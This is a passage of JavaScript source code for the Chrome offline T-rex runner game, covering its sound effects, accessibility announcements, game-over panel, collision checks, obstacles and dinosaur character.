                                       if (this.context.state != 'running') {
                                         this.context.resume();
                                       }
                                     }).bind(this);
        this.context.resume();
      }
      this.panner = this.context.createStereoPanner ?
          this.context.createStereoPanner() :
          null;
    }
  },

  stopAll() {
    this.cancelFootSteps();
  },

  /**
   * Play oscillators at certain frequency and for a certain time.
   * @param {number} frequency
   * @param {number} startTime
   * @param {number} duration
   * @param {?number=} opt_vol
   * @param {number=} opt_pan
   */
  playNote(frequency, startTime, duration, opt_vol, opt_pan) {
    const osc1 = this.context.createOscillator();
    const osc2 = this.context.createOscillator();
    const volume = this.context.createGain();

    // Set oscillator wave type
    osc1.type = 'triangle';
    osc2.type = 'triangle';
    volume.gain.value = 0.1;

    // Set up node routing
    if (this.panner) {
      this.panner.pan.value = opt_pan || 0;
      osc1.connect(volume).connect(this.panner);
      osc2.connect(volume).connect(this.panner);
      this.panner.connect(this.context.destination);
    } else {
      osc1.connect(volume);
      osc2.connect(volume);
      volume.connect(this.context.destination);
    }

    // Detune oscillators for chorus effect
    osc1.frequency.value = frequency + 1;
    osc2.frequency.value = frequency - 2;

    // Fade out
    volume.gain.setValueAtTime(opt_vol || 0.01, startTime + duration - 0.05);
    volume.gain.linearRampToValueAtTime(0.00001, startTime + duration);

    // Start oscillators
    osc1.start(startTime);
    osc2.start(startTime);
    // Stop oscillators
    osc1.stop(startTime + duration);
    osc2.stop(startTime + duration);
  },

  background() {
    if (this.audioCues) {
      const now = this.context.currentTime;
      this.playNote(493.883, now, 0.116);
      this.playNote(659.255, now + 0.116, 0.232);
      this.loopFootSteps();
    }
  },

  loopFootSteps() {
    if (this.audioCues && !this.bgSoundIntervalId) {
      this.bgSoundIntervalId = setInterval(function() {
        this.playNote(73.42, this.context.currentTime, 0.05, 0.16);
        this.playNote(69.30, this.context.currentTime + 0.116, 0.116, 0.16);
      }.bind(this), 280);
    }
  },

  cancelFootSteps() {
    if (this.audioCues && this.bgSoundIntervalId) {
      clearInterval(this.bgSoundIntervalId);
      this.bgSoundIntervalId = null;
      this.playNote(103.83, this.context.currentTime, 0.232, 0.02);
      this.playNote(116.54, this.context.currentTime + 0.116, 0.232, 0.02);
    }
  },

  collect() {
    if (this.audioCues) {
      this.cancelFootSteps();
      const now = this.context.currentTime;
      this.playNote(830.61, now, 0.116);
      this.playNote(1318.51, now + 0.116, 0.232);
    }
  },

  jump() {
    if (this.audioCues) {
      const now = this.context.currentTime;
      this.playNote(659.25, now, 0.116, 0.3, -0.6);
      this.playNote(880, now + 0.116, 0.232, 0.3, -0.6);
    }
  },
};


/**
 * Speak a phrase using Speech Synthesis API for a11y.
 * @param {string} phrase Sentence to speak.
 */
function speakPhrase(phrase) {
  if ('speechSynthesis' in window) {
    const msg = new SpeechSynthesisUtterance(phrase);
    const voices = window.speechSynthesis.getVoices();
    msg.text = phrase;
    speechSynthesis.speak(msg);
  }
}


/**
 * For screen readers make an announcement to the live region.
 * @param {string} phrase Sentence to speak.
 */
function announcePhrase(phrase) {
  if (Runner.a11yStatusEl) {
    Runner.a11yStatusEl.textContent = '';
    Runner.a11yStatusEl.textContent = phrase;
  }
}


/**
 * Returns a string from loadTimeData data object.
 * @param {string} stringName
 * @return {string}
 */
function getA11yString(stringName) {
  return loadTimeData && loadTimeData.valueExists(stringName) ?
      loadTimeData.getString(stringName) :
      '';
}


/**
 * Get random number.
 * @param {number} min
 * @param {number} max
 */
function getRandomNum(min, max) {
  return Math.floor(Math.random() * (max - min + 1)) + min;
}


/**
 * Vibrate on mobile devices.
 * @param {number} duration Duration of the vibration in milliseconds.
 */
function vibrate(duration) {
  if (IS_MOBILE && window.navigator.vibrate) {
    window.navigator.vibrate(duration);
  }
}


/**
 * Create canvas element.
 * @param {Element} container Element to append canvas to.
 * @param {number} width
 * @param {number} height
 * @param {string=} opt_classname
 * @return {HTMLCanvasElement}
 */
function createCanvas(container, width, height, opt_classname) {
  const canvas =
      /** @type {!HTMLCanvasElement} */ (document.createElement('canvas'));
  canvas.className = opt_classname ? Runner.classes.CANVAS + ' ' +
      opt_classname : Runner.classes.CANVAS;
  canvas.width = width;
  canvas.height = height;
  container.appendChild(canvas);

  return canvas;
}


/**
 * Decodes the base 64 audio to ArrayBuffer used by Web Audio.
 * @param {string} base64String
 */
function decodeBase64ToArrayBuffer(base64String) {
  const len = (base64String.length / 4) * 3;
  const str = atob(base64String);
  const arrayBuffer = new ArrayBuffer(len);
  const bytes = new Uint8Array(arrayBuffer);

  for (let i = 0; i < len; i++) {
    bytes[i] = str.charCodeAt(i);
  }
  return bytes.buffer;
}


/**
 * Return the current timestamp.
 * @return {number}
 */
function getTimeStamp() {
  return IS_IOS ? new Date().getTime() : performance.now();
}


//******************************************************************************


/**
 * Game over panel.
 * @param {!HTMLCanvasElement} canvas
 * @param {Object} textImgPos
 * @param {Object} restartImgPos
 * @param {!Object} dimensions Canvas dimensions.
 * @param {Object=} opt_altGameEndImgPos
 * @param {boolean=} opt_altGameActive
 * @constructor
 */
function GameOverPanel(
    canvas, textImgPos, restartImgPos, dimensions, opt_altGameEndImgPos,
    opt_altGameActive) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.canvasDimensions = dimensions;
  this.textImgPos = textImgPos;
  this.restartImgPos = restartImgPos;
  this.altGameEndImgPos = opt_altGameEndImgPos;
  this.altGameModeActive = opt_altGameActive;

  // Retry animation.
  this.frameTimeStamp = 0;
  this.animTimer = 0;
  this.currentFrame = 0;

  this.gameOverRafId = null;

  this.flashTimer = 0;
  this.flashCounter = 0;
  this.originalText = true;
}

GameOverPanel.RESTART_ANIM_DURATION = 875;
GameOverPanel.LOGO_PAUSE_DURATION = 875;
GameOverPanel.FLASH_ITERATIONS = 5;

/**
 * Animation frames spec.
 */
GameOverPanel.animConfig = {
  frames: [0, 36, 72, 108, 144, 180, 216, 252],
  msPerFrame: GameOverPanel.RESTART_ANIM_DURATION / 8,
};

/**
 * Dimensions used in the panel.
 * @enum {number}
 */
GameOverPanel.dimensions = {
  TEXT_X: 0,
  TEXT_Y: 13,
  TEXT_WIDTH: 191,
  TEXT_HEIGHT: 11,
  RESTART_WIDTH: 36,
  RESTART_HEIGHT: 32,
};


GameOverPanel.prototype = {
  /**
   * Update the panel dimensions.
   * @param {number} width New canvas width.
   * @param {number} opt_height Optional new canvas height.
   */
  updateDimensions(width, opt_height) {
    this.canvasDimensions.WIDTH = width;
    if (opt_height) {
      this.canvasDimensions.HEIGHT = opt_height;
    }
    this.currentFrame = GameOverPanel.animConfig.frames.length - 1;
  },

  drawGameOverText(dimensions, opt_useAltText) {
    const centerX = this.canvasDimensions.WIDTH / 2;
    let textSourceX = dimensions.TEXT_X;
    let textSourceY = dimensions.TEXT_Y;
    let textSourceWidth = dimensions.TEXT_WIDTH;
    let textSourceHeight = dimensions.TEXT_HEIGHT;

    const textTargetX = Math.round(centerX - (dimensions.TEXT_WIDTH / 2));
    const textTargetY = Math.round((this.canvasDimensions.HEIGHT - 25) / 3);
    const textTargetWidth = dimensions.TEXT_WIDTH;
    const textTargetHeight = dimensions.TEXT_HEIGHT;

    if (IS_HIDPI) {
      textSourceY *= 2;
      textSourceX *= 2;
      textSourceWidth *= 2;
      textSourceHeight *= 2;
    }

    if (!opt_useAltText) {
      textSourceX += this.textImgPos.x;
      textSourceY += this.textImgPos.y;
    }

    const spriteSource =
        opt_useAltText ? Runner.altCommonImageSprite : Runner.origImageSprite;

    this.canvasCtx.save();

    if (IS_RTL) {
      this.canvasCtx.translate(this.canvasDimensions.WIDTH, 0);
      this.canvasCtx.scale(-1, 1);
    }

    // Game over text from sprite.
    this.canvasCtx.drawImage(
        spriteSource, textSourceX, textSourceY, textSourceWidth,
        textSourceHeight, textTargetX, textTargetY, textTargetWidth,
        textTargetHeight);

    this.canvasCtx.restore();
  },

  /**
   * Draw additional adornments for alternative game types.
   */
  drawAltGameElements(tRex) {
    // Additional adornments.
    if (this.altGameModeActive && Runner.spriteDefinition.ALT_GAME_END_CONFIG) {
      const altGameEndConfig = Runner.spriteDefinition.ALT_GAME_END_CONFIG;

      let altGameEndSourceWidth = altGameEndConfig.WIDTH;
      let altGameEndSourceHeight = altGameEndConfig.HEIGHT;
      const altGameEndTargetX = tRex.xPos + altGameEndConfig.X_OFFSET;
      const altGameEndTargetY = tRex.yPos + altGameEndConfig.Y_OFFSET;

      if (IS_HIDPI) {
        altGameEndSourceWidth *= 2;
        altGameEndSourceHeight *= 2;
      }

      this.canvasCtx.drawImage(
          Runner.altCommonImageSprite, this.altGameEndImgPos.x,
          this.altGameEndImgPos.y, altGameEndSourceWidth,
          altGameEndSourceHeight, altGameEndTargetX, altGameEndTargetY,
          altGameEndConfig.WIDTH, altGameEndConfig.HEIGHT);
    }
  },

  /**
   * Draw restart button.
   */
  drawRestartButton() {
    const dimensions = GameOverPanel.dimensions;
    let framePosX = GameOverPanel.animConfig.frames[this.currentFrame];
    let restartSourceWidth = dimensions.RESTART_WIDTH;
    let restartSourceHeight = dimensions.RESTART_HEIGHT;
    const restartTargetX =
        (this.canvasDimensions.WIDTH / 2) - (dimensions.RESTART_WIDTH / 2);
    const restartTargetY = this.canvasDimensions.HEIGHT / 2;

    if (IS_HIDPI) {
      restartSourceWidth *= 2;
      restartSourceHeight *= 2;
      framePosX *= 2;
    }

    this.canvasCtx.save();

    if (IS_RTL) {
      this.canvasCtx.translate(this.canvasDimensions.WIDTH, 0);
      this.canvasCtx.scale(-1, 1);
    }

    this.canvasCtx.drawImage(
        Runner.origImageSprite, this.restartImgPos.x + framePosX,
        this.restartImgPos.y, restartSourceWidth, restartSourceHeight,
        restartTargetX, restartTargetY, dimensions.RESTART_WIDTH,
        dimensions.RESTART_HEIGHT);
    this.canvasCtx.restore();
  },


  /**
   * Draw the panel.
   * @param {boolean} opt_altGameModeActive
   * @param {!Trex} opt_tRex
   */
  draw(opt_altGameModeActive, opt_tRex) {
    if (opt_altGameModeActive) {
      this.altGameModeActive = opt_altGameModeActive;
    }

    this.drawGameOverText(GameOverPanel.dimensions, false);
    this.drawRestartButton();
    this.drawAltGameElements(opt_tRex);
    this.update();
  },

  /**
   * Update animation frames.
   */
  update() {
    const now = getTimeStamp();
    const deltaTime = now - (this.frameTimeStamp || now);

    this.frameTimeStamp = now;
    this.animTimer += deltaTime;
    this.flashTimer += deltaTime;

    // Restart Button
    if (this.currentFrame == 0 &&
        this.animTimer > GameOverPanel.LOGO_PAUSE_DURATION) {
      this.animTimer = 0;
      this.currentFrame++;
      this.drawRestartButton();
    } else if (
        this.currentFrame > 0 &&
        this.currentFrame < GameOverPanel.animConfig.frames.length) {
      if (this.animTimer >= GameOverPanel.animConfig.msPerFrame) {
        this.currentFrame++;
        this.drawRestartButton();
      }
    } else if (
        !this.altGameModeActive &&
        this.currentFrame == GameOverPanel.animConfig.frames.length) {
      this.reset();
      return;
    }

    // Game over text
    if (this.altGameModeActive &&
        Runner.spriteDefinitionByType.original.ALT_GAME_OVER_TEXT_CONFIG) {
      const altTextConfig =
          Runner.spriteDefinitionByType.original.ALT_GAME_OVER_TEXT_CONFIG;

      if (this.flashCounter < GameOverPanel.FLASH_ITERATIONS &&
          this.flashTimer > altTextConfig.FLASH_DURATION) {
        this.flashTimer = 0;
        this.originalText = !this.originalText;

        this.clearGameOverTextBounds();
        if (this.originalText) {
          this.drawGameOverText(GameOverPanel.dimensions, false);
          this.flashCounter++;
        } else {
          this.drawGameOverText(altTextConfig, true);
        }
      } else if (this.flashCounter >= GameOverPanel.FLASH_ITERATIONS) {
        this.reset();
        return;
      }
    }

    this.gameOverRafId = requestAnimationFrame(this.update.bind(this));
  },

  /**
   * Clear game over text.
   */
  clearGameOverTextBounds() {
    this.canvasCtx.save();

    this.canvasCtx.clearRect(
        Math.round(
            this.canvasDimensions.WIDTH / 2 -
            (GameOverPanel.dimensions.TEXT_WIDTH / 2)),
        Math.round((this.canvasDimensions.HEIGHT - 25) / 3),
        GameOverPanel.dimensions.TEXT_WIDTH,
        GameOverPanel.dimensions.TEXT_HEIGHT + 4);
    this.canvasCtx.restore();
  },

  reset() {
    if (this.gameOverRafId) {
      cancelAnimationFrame(this.gameOverRafId);
      this.gameOverRafId = null;
    }
    this.animTimer = 0;
    this.frameTimeStamp = 0;
    this.currentFrame = 0;
    this.flashTimer = 0;
    this.flashCounter = 0;
    this.originalText = true;
  },
};


//******************************************************************************

/**
 * Check for a collision.
 * @param {!Obstacle} obstacle
 * @param {!Trex} tRex T-rex object.
 * @param {CanvasRenderingContext2D=} opt_canvasCtx Optional canvas context for
 *    drawing collision boxes.
 * @return {Array<CollisionBox>|undefined}
 */
function checkForCollision(obstacle, tRex, opt_canvasCtx) {
  const obstacleBoxXPos = Runner.defaultDimensions.WIDTH + obstacle.xPos;

  // Adjustments are made to the bounding box as there is a 1 pixel white
  // border around the t-rex and obstacles.
  const tRexBox = new CollisionBox(
      tRex.xPos + 1,
      tRex.yPos + 1,
      tRex.config.WIDTH - 2,
      tRex.config.HEIGHT - 2);

  const obstacleBox = new CollisionBox(
      obstacle.xPos + 1,
      obstacle.yPos + 1,
      obstacle.typeConfig.width * obstacle.size - 2,
      obstacle.typeConfig.height - 2);

  // Debug outer box
  if (opt_canvasCtx) {
    drawCollisionBoxes(opt_canvasCtx, tRexBox, obstacleBox);
  }

  // Simple outer bounds check.
  if (boxCompare(tRexBox, obstacleBox)) {
    const collisionBoxes = obstacle.collisionBoxes;
    let tRexCollisionBoxes = [];

    if (Runner.isAltGameModeEnabled()) {
      tRexCollisionBoxes = Runner.spriteDefinition.TREX.COLLISION_BOXES;
    } else {
      tRexCollisionBoxes = tRex.ducking ? Trex.collisionBoxes.DUCKING :
                                          Trex.collisionBoxes.RUNNING;
    }

    // Detailed axis aligned box check.
    for (let t = 0; t < tRexCollisionBoxes.length; t++) {
      for (let i = 0; i < collisionBoxes.length; i++) {
        // Adjust the box to actual positions.
        const adjTrexBox =
            createAdjustedCollisionBox(tRexCollisionBoxes[t], tRexBox);
        const adjObstacleBox =
            createAdjustedCollisionBox(collisionBoxes[i], obstacleBox);
        const crashed = boxCompare(adjTrexBox, adjObstacleBox);

        // Draw boxes for debug.
        if (opt_canvasCtx) {
          drawCollisionBoxes(opt_canvasCtx, adjTrexBox, adjObstacleBox);
        }

        if (crashed) {
          return [adjTrexBox, adjObstacleBox];
        }
      }
    }
  }
}


/**
 * Adjust the collision box.
 * @param {!CollisionBox} box The original box.
 * @param {!CollisionBox} adjustment Adjustment box.
 * @return {CollisionBox} The adjusted collision box object.
 */
function createAdjustedCollisionBox(box, adjustment) {
  return new CollisionBox(
      box.x + adjustment.x,
      box.y + adjustment.y,
      box.width,
      box.height);
}


/**
 * Draw the collision boxes for debug.
 */
function drawCollisionBoxes(canvasCtx, tRexBox, obstacleBox) {
  canvasCtx.save();
  canvasCtx.strokeStyle = '#f00';
  canvasCtx.strokeRect(tRexBox.x, tRexBox.y, tRexBox.width, tRexBox.height);

  canvasCtx.strokeStyle = '#0f0';
  canvasCtx.strokeRect(obstacleBox.x, obstacleBox.y,
      obstacleBox.width, obstacleBox.height);
  canvasCtx.restore();
}


/**
 * Compare two collision boxes for a collision.
 * @param {CollisionBox} tRexBox
 * @param {CollisionBox} obstacleBox
 * @return {boolean} Whether the boxes intersected.
 */
function boxCompare(tRexBox, obstacleBox) {
  let crashed = false;
  const tRexBoxX = tRexBox.x;
  const tRexBoxY = tRexBox.y;

  const obstacleBoxX = obstacleBox.x;
  const obstacleBoxY = obstacleBox.y;

  // Axis-Aligned Bounding Box method.
  if (tRexBox.x < obstacleBoxX + obstacleBox.width &&
      tRexBox.x + tRexBox.width > obstacleBoxX &&
      tRexBox.y < obstacleBox.y + obstacleBox.height &&
      tRexBox.height + tRexBox.y > obstacleBox.y) {
    crashed = true;
  }

  return crashed;
}


//******************************************************************************

/**
 * Collision box object.
 * @param {number} x X position.
 * @param {number} y Y Position.
 * @param {number} w Width.
 * @param {number} h Height.
 * @constructor
 */
function CollisionBox(x, y, w, h) {
  this.x = x;
  this.y = y;
  this.width = w;
  this.height = h;
}


//******************************************************************************

/**
 * Obstacle.
 * @param {CanvasRenderingContext2D} canvasCtx
 * @param {ObstacleType} type
 * @param {Object} spriteImgPos Obstacle position in sprite.
 * @param {Object} dimensions
 * @param {number} gapCoefficient Multiplier in determining the gap.
 * @param {number} speed
 * @param {number=} opt_xOffset
 * @param {boolean=} opt_isAltGameMode
 * @constructor
 */
function Obstacle(
    canvasCtx, type, spriteImgPos, dimensions, gapCoefficient, speed,
    opt_xOffset, opt_isAltGameMode) {
  this.canvasCtx = canvasCtx;
  this.spritePos = spriteImgPos;
  this.typeConfig = type;
  this.gapCoefficient = Runner.slowDown ? gapCoefficient * 2 : gapCoefficient;
  this.size = getRandomNum(1, Obstacle.MAX_OBSTACLE_LENGTH);
  this.dimensions = dimensions;
  this.remove = false;
  this.xPos = dimensions.WIDTH + (opt_xOffset || 0);
  this.yPos = 0;
  this.width = 0;
  this.collisionBoxes = [];
  this.gap = 0;
  this.speedOffset = 0;
  this.altGameModeActive = opt_isAltGameMode;
  this.imageSprite = this.typeConfig.type == 'COLLECTABLE' ?
      Runner.altCommonImageSprite :
      this.altGameModeActive ? Runner.altGameImageSprite : Runner.imageSprite;

  // For animated obstacles.
  this.currentFrame = 0;
  this.timer = 0;

  this.init(speed);
}

/**
 * Coefficient for calculating the maximum gap.
 */
Obstacle.MAX_GAP_COEFFICIENT = 1.5;

/**
 * Maximum obstacle grouping count.
 */
Obstacle.MAX_OBSTACLE_LENGTH = 3;


Obstacle.prototype = {
  /**
   * Initialise the DOM for the obstacle.
   * @param {number} speed
   */
  init(speed) {
    this.cloneCollisionBoxes();

    // Only allow sizing if we're at the right speed.
    if (this.size > 1 && this.typeConfig.multipleSpeed > speed) {
      this.size = 1;
    }

    this.width = this.typeConfig.width * this.size;

    // Check if obstacle can be positioned at various heights.
    if (Array.isArray(this.typeConfig.yPos)) {
      const yPosConfig =
          IS_MOBILE ? this.typeConfig.yPosMobile : this.typeConfig.yPos;
      this.yPos = yPosConfig[getRandomNum(0, yPosConfig.length - 1)];
    } else {
      this.yPos = this.typeConfig.yPos;
    }

    this.draw();

    // Make collision box adjustments,
    // Central box is adjusted to the size as one box.
    //      ____        ______        ________
    //    _|   |-|    _|     |-|    _|       |-|
    //   | |<->| |   | |<--->| |   | |<----->| |
    //   | | 1 | |   | |  2  | |   | |   3   | |
    //   |_|___|_|   |_|_____|_|   |_|_______|_|
    //
    if (this.size > 1) {
      this.collisionBoxes[1].width = this.width - this.collisionBoxes[0].width -
          this.collisionBoxes[2].width;
      this.collisionBoxes[2].x = this.width - this.collisionBoxes[2].width;
    }

    // For obstacles that go at a different speed from the horizon.
    if (this.typeConfig.speedOffset) {
      this.speedOffset = Math.random() > 0.5 ? this.typeConfig.speedOffset :
                                               -this.typeConfig.speedOffset;
    }

    this.gap = this.getGap(this.gapCoefficient, speed);

    // Increase gap for audio cues enabled.
    if (Runner.audioCues) {
      this.gap *= 2;
    }
  },

  /**
   * Draw and crop based on size.
   */
  draw() {
    let sourceWidth = this.typeConfig.width;
    let sourceHeight = this.typeConfig.height;

    if (IS_HIDPI) {
      sourceWidth = sourceWidth * 2;
      sourceHeight = sourceHeight * 2;
    }

    // X position in sprite.
    let sourceX =
        (sourceWidth * this.size) * (0.5 * (this.size - 1)) + this.spritePos.x;

    // Animation frames.
    if (this.currentFrame > 0) {
      sourceX += sourceWidth * this.currentFrame;
    }

    this.canvasCtx.drawImage(
        this.imageSprite, sourceX, this.spritePos.y, sourceWidth * this.size,
        sourceHeight, this.xPos, this.yPos, this.typeConfig.width * this.size,
        this.typeConfig.height);
  },

  /**
   * Obstacle frame update.
   * @param {number} deltaTime
   * @param {number} speed
   */
  update(deltaTime, speed) {
    if (!this.remove) {
      if (this.typeConfig.speedOffset) {
        speed += this.speedOffset;
      }
      this.xPos -= Math.floor((speed * FPS / 1000) * deltaTime);

      // Update frame
      if (this.typeConfig.numFrames) {
        this.timer += deltaTime;
        if (this.timer >= this.typeConfig.frameRate) {
          this.currentFrame =
              this.currentFrame === this.typeConfig.numFrames - 1 ?
              0 :
              this.currentFrame + 1;
          this.timer = 0;
        }
      }
      this.draw();

      if (!this.isVisible()) {
        this.remove = true;
      }
    }
  },

  /**
   * Calculate a random gap size.
   * - Minimum gap gets wider as speed increases
   * @param {number} gapCoefficient
   * @param {number} speed
   * @return {number} The gap size.
   */
  getGap(gapCoefficient, speed) {
    const minGap = Math.round(
        this.width * speed + this.typeConfig.minGap * gapCoefficient);
    const maxGap = Math.round(minGap * Obstacle.MAX_GAP_COEFFICIENT);
    return getRandomNum(minGap, maxGap);
  },

  /**
   * Check if obstacle is visible.
   * @return {boolean} Whether the obstacle is in the game area.
   */
  isVisible() {
    return this.xPos + this.width > 0;
  },

  /**
   * Make a copy of the collision boxes, since these will change based on
   * obstacle type and size.
   */
  cloneCollisionBoxes() {
    const collisionBoxes = this.typeConfig.collisionBoxes;

    for (let i = collisionBoxes.length - 1; i >= 0; i--) {
      this.collisionBoxes[i] = new CollisionBox(
          collisionBoxes[i].x, collisionBoxes[i].y, collisionBoxes[i].width,
          collisionBoxes[i].height);
    }
  },
};


//******************************************************************************
/**
 * T-rex game character.
 * @param {HTMLCanvasElement} canvas
 * @param {Object} spritePos Positioning within image sprite.
 * @constructor
 */
function Trex(canvas, spritePos) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.spritePos = spritePos;
  this.xPos = 0;
  this.yPos = 0;
  this.xInitialPos = 0;
  // Position when on the ground.
  this.groundYPos = 0;
  this.currentFrame = 0;
  this.currentAnimFrames = [];
  this.blinkDelay = 0;
  this.blinkCount = 0;
  this.animStartTime = 0;
  this.timer = 0;
  this.msPerFrame = 1000 / FPS;
  this.config = Object.assign(Trex.config, Trex.normalJumpConfig);
  // Current status.
  this.status = Trex.status.WAITING;
  this.jumping = false;
  this.ducking = false;
  this.jumpVelocity = 0;
  this.reachedMinHeight = false;
  this.speedDrop = false;
  this.jumpCount = 0;
  this.jumpspotX = 0;
  this.altGameModeEnabled = false;
  this.flashing = false;

  this.init();
}


/**
 * T-rex player config.
 */
Trex.config = {
  DROP_VELOCITY: -5,
  FLASH_OFF: 175,
  FLASH_ON: 100,
  HEIGHT: 47,
  HEIGHT_DUCK: 25,
  INTRO_DURATION: 1500,
  SPEED_DROP_COEFFICIENT: 3,
  SPRITE_WIDTH: 262,
  START_X_POS: 50,
  WIDTH: 44,
  WIDTH_DUCK: 59,
};

Trex.slowJumpConfig = {
  GRAVITY: 0.25,
  MAX_JUMP_HEIGHT: 50,
  MIN_JUMP_HEIGHT: 45,
  INITIAL_JUMP_VELOCITY: -20,
};

Trex.normalJumpConfig = {
  GRAVITY: 0.6,
  MAX_JUMP_HEIGHT: 30,
  MIN_JUMP_HEIGHT: 30,
  INITIAL_JUMP_VELOCITY: -10,
};

/**
 * Used in collision detection.
 * @enum {Array<CollisionBox>}
 */
Trex.collisionBoxes = {
  DUCKING: [new CollisionBox(1, 18, 55, 25)],
  RUNNING: [
    new CollisionBox(22, 0, 17, 16),
    new CollisionBox(1, 18, 30, 9),
    new CollisionBox(10, 35, 14, 8),
    new CollisionBox(1, 24, 29, 5),
    new CollisionBox(5, 30, 21, 4),
    new CollisionBox(9, 34, 15, 4),
  ],
};


/**
 * Animation states.
 * @enum {string}
 */
Trex.status = {
  CRASHED: 'CRASHED',
  DUCKING: 'DUCKING',
  JUMPING: 'JUMPING',
  RUNNING: 'RUNNING',
  WAITING: 'WAITING',
};

/**
 * Blinking coefficient.
 * @const
 */
Trex.BLINK_TIMING = 7000;


/**
 * Animation config for different states.
 * @enum {Object}
 */
Trex.animFrames = {
  WAITING: {
    frames: [44, 0],
    msPerFrame: 1000 / 3,
  },
  RUNNING: {
    frames: [88, 132],
    msPerFrame: 1000 / 12,
  },
  CRASHED: {
    frames: [220],
    msPerFrame: 1000 / 60,
  },
  JUMPING: {
    frames: [0],
    msPerFrame: 1000 / 60,
  },
  DUCKING: {
    frames: [264, 323],
    msPerFrame: 1000 / 8,
  },
};


Trex.prototype = {
  /**
   * T-rex player initialiser.
   * Sets the t-rex to blink at random intervals.
   */
  init() {
    this.groundYPos = Runner.defaultDimensions.HEIGHT - this.config.HEIGHT -
        Runner.config.BOTTOM_PAD;
    this.yPos = this.groundYPos;
    this.minJumpHeight = this.groundYPos - this.config.MIN_JUMP_HEIGHT;

    this.draw(0, 0);
    this.update(0, Trex.status.WAITING);
  },

  /**
   * Assign the appropriate jump parameters based on the game speed.
   */
  enableSlowConfig: function() {
    const jumpConfig =
        Runner.slowDown ? Trex.slowJumpConfig : Trex.normalJumpConfig;
    Trex.config = Object.assign(Trex.config, jumpConfig);

    this.adjustAltGameConfigForSlowSpeed();
  },

  /**
   * Enables the alternative game. Redefines the dino config.
   * @param {Object} spritePos New positioning within image sprite.
   */
  enableAltGameMode: function(spritePos) {
    this.altGameModeEnabled = true;
    this.spritePos = spritePos;
    const spriteDefinition = Runner.spriteDefinition['TREX'];

    // Update animation frames.
    Trex.animFrames.RUNNING.frames =
        [spriteDefinition.RUNNING_1.x, spriteDefinition.RUNNING_2.x];
    Trex.animFrames.CRASHED.frames = [spriteDefinition.CRASHED.x];

    if (typeof spriteDefinition.JUMPING.x == 'object') {
      Trex.animFrames.JUMPING.frames = spriteDefinition.JUMPING.x;
    } else {
      Trex.animFrames.JUMPING.frames = [spriteDefinition.JUMPING.x];
    }

    Trex.animFrames.DUCKING.frames =
        [spriteDefinition.RUNNING_1.x, spriteDefinition.RUNNING_2.x];

    // Update Trex config
    Trex.config.GRAVITY = spriteDefinition.GRAVITY || Trex.config.GRAVITY;
    Trex.config.HEIGHT = spriteDefinition.RUNNING_1.h;
    Trex.config.INITIAL_JUMP_VELOCITY = spriteDefinition.INITIAL_JUMP_VELOCITY;
    Trex.config.MAX_JUMP_HEIGHT = spriteDefinition.MAX_JUMP_HEIGHT;
    Trex.config.MIN_JUMP_HEIGHT = spriteDefinition.MIN_JUMP_HEIGHT;
    Trex.config.WIDTH = spriteDefinition.RUNNING_1.w;
    Trex.config.WIDTH_JUMP = spriteDefinition.JUMPING.w;
    Trex.config.INVERT_JUMP = spriteDefinition.INVERT_JUMP;

    this.adjustAltGameConfigForSlowSpeed(spriteDefinition.GRAVITY);
    this.config = Trex.config;

    // Adjust bottom horizon placement.
    this.groundYPos = Runner.defaultDimensions.HEIGHT - this.config.HEIGHT -
        Runner.spriteDefinition['BOTTOM_PAD'];
    this.yPos = this.groundYPos;
    this.reset();
  },

  /**
   * Slow speeds adjustments for the alt game modes.
   * @param {number=} opt_gravityValue
   */
  adjustAltGameConfigForSlowSpeed: function(opt_gravityValue) {
    if (Runner.slowDown) {
      if (opt_gravityValue) {
        Trex.config.GRAVITY = opt_gravityValue / 1.5;
      }
      Trex.config.MIN_JUMP_HEIGHT *= 1.5;
      Trex.config.MAX_JUMP_HEIGHT *= 1.5;
      Trex.config.INITIAL_JUMP_VELOCITY =
          Trex.config.INITIAL_JUMP_VELOCITY * 1.5;
    }
  },

  /**
   * Setter whether dino is flashing.
   * @param {boolean} status
   */
  setFlashing: function(status) {
    this.flashing = status;
  },

  /**
   * Setter for the jump velocity.
   * The appropriate drop velocity is also set.
   * @param {number} setting
   */
  setJumpVelocity(setting) {
    this.config.INITIAL_JUMP_VELOCITY = -setting;
    this.config.DROP_VELOCITY = -setting / 2;
  },

  /**
   * Set the animation status.
   * @param {!number} deltaTime
   * @param {Trex.status=} opt_status Optional status to switch to.
   */
  update(deltaTime, opt_status) {
    this.timer += deltaTime;

    // Update the status.
    if (opt_status) {
      this.status = opt_status;
      this.currentFrame = 0;
      this.msPerFrame = Trex.animFrames[opt_status].msPerFrame;
      this.currentAnimFrames = Trex.animFrames[opt_status].frames;

      if (opt_status === Trex.status.WAITING) {
        this.animStartTime = getTimeStamp();
        this.setBlinkDelay();
      }
    }
    // Game intro animation, T-rex moves in from the left.
    if (this.playingIntro && this.xPos < this.config.START_X_POS) {
      this.xPos += Math.round((this.config.START_X_POS /
          this.config.INTRO_DURATION) * deltaTime);
      this.xInitialPos = this.xPos;
    }

    if (this.status === Trex.status.WAITING) {
      this.blink(getTimeStamp());
    } else {
      this.draw(this.currentAnimFrames[this.currentFrame], 0);
    }

    // Update the frame position.
    if (!this.flashing && this.timer >= this.msPerFrame) {
      this.currentFrame = this.currentFrame ==
          this.currentAnimFrames.length - 1 ? 0 : this.currentFrame + 1;
      this.timer = 0;
    }

    if (!this.altGameModeEnabled) {
      // Speed drop becomes duck if the down key is still being pressed.
      if (this.speedDrop && this.yPos === this.groundYPos) {
        this.speedDrop = false;
        this.setDuck(true);
      }
    }
  },

  /**
   * Draw the t-rex to a particular position.
   * @param {number} x
   * @param {number} y
   */
  draw(x, y) {
    let sourceX = x;
    let sourceY = y;
    let sourceWidth = this.ducking && this.status !== Trex.status.CRASHED ?
        this.config.WIDTH_DUCK :
        this.config.WIDTH;
    let sourceHeight = this.config.HEIGHT;
    const outputHeight = sourceHeight;

    let jumpOffset = Runner.spriteDefinition.TREX.JUMPING.xOffset;

    // Width of sprite changes on jump.
    if (this.altGameModeEnabled && this.jumping &&
        this.status !== Trex.status.CRASHED) {
      sourceWidth = this.config.WIDTH_JUMP;
    }

    if (IS_HIDPI) {
      sourceX *= 2;
      sourceY *= 2;
      sourceWidth *= 2;
      sourceHeight *= 2;
      jumpOffset *= 2;
    }

    // Adjustments for sprite sheet position.
    sourceX += this.spritePos.x;
    sourceY += this.spritePos.y;

    // Flashing.
    if (this.flashing) {
      if (this.timer < this.config.FLASH_ON) {
